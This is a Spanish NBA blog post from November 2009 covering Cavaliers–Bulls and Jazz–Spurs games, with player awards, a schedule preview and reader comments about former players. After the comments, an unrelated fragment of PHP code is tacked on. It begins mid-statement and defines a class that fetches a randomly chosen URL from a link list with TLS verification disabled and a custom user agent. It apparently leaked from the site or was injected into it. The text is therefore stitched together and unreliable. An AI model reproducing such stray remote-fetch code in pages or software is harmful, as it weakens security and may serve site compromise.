La Crónica (05/11/2009)

06 de November de 2009 por MagicJohnson32

Dos partidos de jueves y dos favoritos para el hoyo.

Ahora sí, los Cavs empataron en sólo 3 partidos el número de derrotas de todo el curso pasado en el Quicken Loans Arena. No iba a ser la noche de LeBron: sufrió una torcedura, se pegó un costalazo en la grada tratando de salvar un balón imposible, le hicieron sudar cada canasta con una dura defensa de Luol Deng y de los Bulls en general y por último, no le pitaron una posible falta en un double-team con Deng y Noah en la jugada final para ganar el partido. Por su parte, los pupilos de Del Negro plantearon un partido a cara de perro evitando que los Cavs tomaran la iniciativa, adaptándose muy bien siempre a cada situación y llevando el partido al filo de la navaja. Los pequeños detalles decidieron. 12 pérdidas de los Cavs por 6 de los Bulls y 12 de 20 en tiros libres fueron los pequeños detalles que condenaron a los locales.

Por cierto, que si alguien tiene curiosidad de porqué Taj Gibson le quitó la plaza de titular a Tyrus Thomas la razón es sencillamente que este último termina de salir de un proceso gripal. Ya nos extrañaba.

Por su parte los Spurs visitaron Salt Lake, que ayer se vistió como el infierno que fue antaño. Espectacular duelo de Parker&Duncan contra los que anoche parecían ser la reencarnación de Stockton y Malone. Deron y Boozer ganaron de calle el choque, bien secundados además por Brewer, Kirilenko, Okur e incluso el rookie Wes Matthews. ¿Vuelven los Jazz a la palestra?

PREMIOS

MVP: Con patatitas se han comido Deron Williams y Carlos Boozer a los Spurs. 27 puntos cada uno, con 7 rebotes y 9 asistencias el primero y 14 rebotes el segundo.

Rookie: 2 partidos pero actuaciones destacadas de los rookies. Partidazo de DaJuan Blair, 14 puntos y 9 rebotes en 21 minutos de juego; 12 puntitos de Wesley Matthews cubriendo  con acierto las bajas de CJ Miles y Kyle Korver; y 11 puntos y 7 rebotes de Taj Gibson en su primera titularidad por los Bulls.

Sorpresa: No ha sido una jornada de grandes sorpresas y decepciones. Si hay que destacar algo, los 12 puntos antes nombrados de Wesley Matthews.

Decepción: Rebuscando, rebuscando y cogido un poco por los pelos, nombraríamos las discretas de actuación de 2 secundarios como Manu Ginobili o Maurice Williams. Sus equipos necesitan mucho más de ellos.

Esfuerzo en vano: 25 puntos, 7 rebotes y 6 asistencias. Los típicos números de Lebron James que le valen el MVP si gana y el premio de mayor esfuerzo en vano si pierde.

RAZONES PARA TRASNOCHAR

Uno de los varios motivos que nos obligará a trasnochar la próxima madrugada del viernes al sábado es el mismo por el cual muchos neoyorquinos se habrán gastado un buen dinero: LeBron juega su único partido de la temporada en el Madison (2h00). Recordemos que su última visita se saldó con un memorable pseudo triple doble (48 horas después del partido se le anuló el que había supuesto su décimo rebote): 52 puntos, 11 asistencias y 9 capturas bajo los aros. Por si esto fuera poco, la motivación de LeBron estará disparada tras el polémico final de partido vivido anoche ante los Bulls y debido también a que hoy se celebra en NY el desfile de campeones de sus queridísimos Yankees.

Pero hay más. De hecho, hay muchísimo más, en concreto otros 12 partidos, entre los que destacan los de los dos únicos invictos, Celtics y Nuggets, contra Suns y Heat respectivamente (ambos a la 1h30). Valdrá la pena prestar atención también a Dwight Howard, en su venganza ante unos Pistons que el pasado martes lograron anularle y esta noche visitan Orlando (1h00). De la tanda final de partidos, la de las 4h30, nos quedamos con el Spurs-Blazers, con toda la pinta de última oportunidad para el experimento de McMillan de colocar a Blake de titular, y el Grizzlies-Lakers (televisado en directo por Cuatro), sin Bynum ni Pau pero con Kobe y Marc Gasol a toda máquina.

Comenta

8 comentarios a esta entrada

  1. Love Denise dice:
    #1

    no viene a cuento, pero….
    ¿alguien sabe que ha sido de Latrell sprewell y Allan Houston?

      Citar

  2. sergio dice:
    #2

    Yo de Latrell Sprewell lo ultimo que se es cuando dijo que no aceptaba un contrato de 7 millones al año “porque tenia una familia que mantener”…. aunque antes cobraba el doble, todo hay que decirlo. No se si seria la temporada 2004 o 2005. Despues intentaron ficharlo varios equipos como agente libre pero no pudo ser (entre ellos LA)

    Despues problemas de impuestos, paga a sus hijos y varias historias relacionadas con su yate, entre ellas un presunto intento de estrangulamiento a una chica cuando estaban en el temita….

    Sobre Houston nada tan sobrio como la vida post-NBA de Sprewell aunque tampoco se mucho desde su fugaz vuelta a los Knicks hace 2 o 3 años. Recaudo fondos para Obama y tiene un cargo en los Knicks… no me preguntes cual

      Citar

  3. Dantley2 dice:
    #3

    Ya era hora que despertara Boozer. Y Deron en su línea, es un reloj el tío. Pocos minutos está jugando Duncan, o la cosa va demasiado cuesta abajo en temas de edad o no sé muy bien. Eso sí, lo de Blair sigue siendo impresionante

      Citar

  4. Love Denise dice:
    #4

    gracias sergio por responder

    y este wesley matthews? de donde ha salido? no lo conocia de nada, en nba.com no viene ni su foto

      Citar

  5. aro_pasado_no_newtoniano dice:
    #5

    Espectacular lo de Houston.

      Citar

  6. Óscar dice:
    #6

    Wesley Matthews es hijo del ex-jugador NBA con el mismo nombre (aunque le llamen “Wes” Matthews). El padre fué un base trotamundos (LAL, ATL, WAS, CHI,…). Y el hijo es un 2/3, rookie que se ha ganado en pretemporada (y antes en los training camps) un hueco en los Jazz, y no sólo en el roster, sino también en la rotación, al menos hasta que se recupere Korver. Lo vi en directo contra el Madrid y me gustó bastante por su intensidad, es capaz de hacer bastantes cosas sobre la cancha y es muy físico, buen defensor. Jogó en Marquette.
    Y en cuanto a Allan Houston, aún aparecía el año pasado en la lista de jugadores de los Knicks, aunque era como jugador retirado pero con contrato garantizado… tras 3 años sin jugar (como ahora Mobley). Era la elegancia hecha jugador, del tipo Steve Smith, uno de mis favoritos. Como dice Sergio, está en diversas causas benéficas y sigue en la franquicia, como asistente del “Presidente de Operaciones de Baloncesto” (Donnie Walsh) … Vaya cargos se curran.

      Citar

  7. Love Denise dice:
    #7

    gracias oscar por la informacion

      Citar

  8. Tobal dice:
    #8

    Los Bulls jugaron un partido muy serio en la cancha de Cleveland,todos los jugadores aportando tanto en defensa como en ataque,me gusto bastante Taj Gibson que anotó con su buena mano y reboteó bien.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>